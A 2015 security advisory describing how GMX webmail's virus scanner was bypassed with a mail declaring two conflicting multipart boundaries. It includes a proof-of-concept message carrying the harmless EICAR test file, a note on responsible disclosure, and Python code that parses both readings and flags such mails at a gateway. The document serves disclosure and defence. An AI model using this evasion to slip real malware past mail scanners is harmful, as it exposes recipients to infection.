July 2015

Please note that republishing this article in full or in part is only allowed under the conditions described here.

Bypassing GMX Virus Scanning using Conflicting MIME Boundaries

The virus scanner integrated in GMX mail can be bypassed by using conflicting MIME boundaries, i.e. a mail with two Content-Type headers that declare different multipart boundaries. This kind of evasion is described in detail in Dubious MIME - Conflicting Multipart Boundaries.

Proof Of Concept

    From: foo
    To: bar
    Subject: eicar - conflicting boundaries
    Mime-Version: 1.0
    Content-type: multipart/mixed; boundary=foo
    Content-type: multipart/mixed; boundary=bar

    --foo
    Content-type: text/plain

    --bar
    Content-type: application/octet-stream; name=eicar.com
    Content-Transfer-Encoding: base64

    WDVPIVAlQEFQWzRcUFpYNTQoUF4pN0NDKTd9JEVJQ0FSLVNU
    QU5EQVJELUFOVElWSVJVUy1URVNULUZJTEUhJEgrSCo=
    --bar--
    --foo--

GMX Webmail uses the second boundary 'bar' when displaying the mail and when offering attachments for download. This way it gives the user access to the attached file 'eicar.com', which contains the EICAR test virus. The virus scanner instead uses the first boundary 'foo'; with that boundary the mail consists of a single text/plain part whose body merely happens to contain the '--bar' lines, so the scanner never sees the attached virus.

Responsible Disclosure

The issue was reported to GMX in 06/2015 (ticket C542162419) and fixed within a few weeks.
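To make the two interpretations of the proof of concept concrete, here is an added example (not part of the original advisory, and not GMX's or the scanner's code) that parses the proof-of-concept mail twice with a small RFC 2046 style boundary splitter: once honouring the first Content-Type header, as the scanner did, and once honouring the last, as the webmail did. It also includes the check a mail gateway could apply to flag or reject messages whose top-level Content-Type headers disagree on the boundary. The message is reconstructed from the proof of concept above with CRLF line endings; the function names are my own.

```python
import base64
import re

# EICAR test string, base64-encoded exactly as in the proof of concept above.
EICAR_B64 = ("WDVPIVAlQEFQWzRcUFpYNTQoUF4pN0NDKTd9JEVJQ0FSLVNU"
             "QU5EQVJELUFOVElWSVJVUy1URVNULUZJTEUhJEgrSCo=")

# The proof-of-concept mail, reconstructed here (constructed input) with CRLF line endings.
POC_MAIL = "\r\n".join([
    "From: foo",
    "To: bar",
    "Subject: eicar - conflicting boundaries",
    "Mime-Version: 1.0",
    "Content-type: multipart/mixed; boundary=foo",
    "Content-type: multipart/mixed; boundary=bar",
    "",
    "--foo",
    "Content-type: text/plain",
    "",
    "--bar",
    "Content-type: application/octet-stream; name=eicar.com",
    "Content-Transfer-Encoding: base64",
    "",
    EICAR_B64,
    "--bar--",
    "--foo--",
    "",
])


def parse_headers(head):
    """Return [(lowercased name, value)] for a header block, keeping duplicates in order."""
    headers = []
    for line in head.split("\r\n"):
        if not line:
            continue
        if line[0] in " \t" and headers:          # folded continuation line
            name, value = headers[-1]
            headers[-1] = (name, value + " " + line.strip())
        else:
            name, _, value = line.partition(":")
            headers.append((name.strip().lower(), value.strip()))
    return headers


def header_param(value, param):
    """Extract a parameter such as boundary= or name= from a header value (None if absent)."""
    m = re.search(r'(?:^|;)\s*' + param + r'="?([^";]+)"?', value, re.I)
    return m.group(1).strip() if m else None


def split_multipart(body, boundary):
    """Return the raw parts between --boundary delimiters; preamble and epilogue are dropped."""
    delim, close = "--" + boundary, "--" + boundary + "--"
    parts, current = [], None
    for line in body.split("\r\n"):
        if line == delim or line == close:
            if current is not None:
                parts.append("\r\n".join(current))
            if line == close:
                break
            current = []
        elif current is not None:
            current.append(line)
    return parts


def parse_parts(raw, pick):
    """Parse the message honouring either the FIRST or the LAST top-level Content-Type
    header: 'first' is what the scanner did, 'last' is what the webmail did."""
    head, _, body = raw.partition("\r\n\r\n")
    ctypes = [v for n, v in parse_headers(head) if n == "content-type"]
    ctype = ctypes[0] if pick == "first" else ctypes[-1]
    boundary = header_param(ctype, "boundary")
    parts = []
    for part in split_multipart(body, boundary):
        phead, _, pbody = part.partition("\r\n\r\n")
        ph = parse_headers(phead)
        pct = next((v for n, v in ph if n == "content-type"), "text/plain")
        cte = next((v for n, v in ph if n == "content-transfer-encoding"), "7bit")
        data = base64.b64decode(pbody) if cte.lower() == "base64" else pbody.encode()
        parts.append({"type": pct.split(";")[0].strip().lower(),
                      "name": header_param(pct, "name"),
                      "data": data})
    return parts


def attachments(raw, pick):
    """Named parts a consumer would offer for download: [(filename, decoded bytes)]."""
    return [(p["name"], p["data"]) for p in parse_parts(raw, pick) if p["name"]]


def has_conflicting_boundaries(raw):
    """Gateway check: True if the top-level Content-Type headers disagree on the boundary."""
    head, _, _ = raw.partition("\r\n\r\n")
    boundaries = {header_param(v, "boundary")
                  for n, v in parse_headers(head) if n == "content-type"}
    return len(boundaries) > 1


if __name__ == "__main__":
    for pick in ("first", "last"):
        view = [(p["type"], p["name"], len(p["data"])) for p in parse_parts(POC_MAIL, pick)]
        print(f"{pick} Content-Type header: {view}")
    print("conflicting boundaries:", has_conflicting_boundaries(POC_MAIL))
```

Honouring the first header yields one text/plain part and no attachment; honouring the last header yields the 68-byte 'eicar.com' attachment. Any scanner that does not either reject such a message or scan every plausible interpretation of it can be bypassed in the same way.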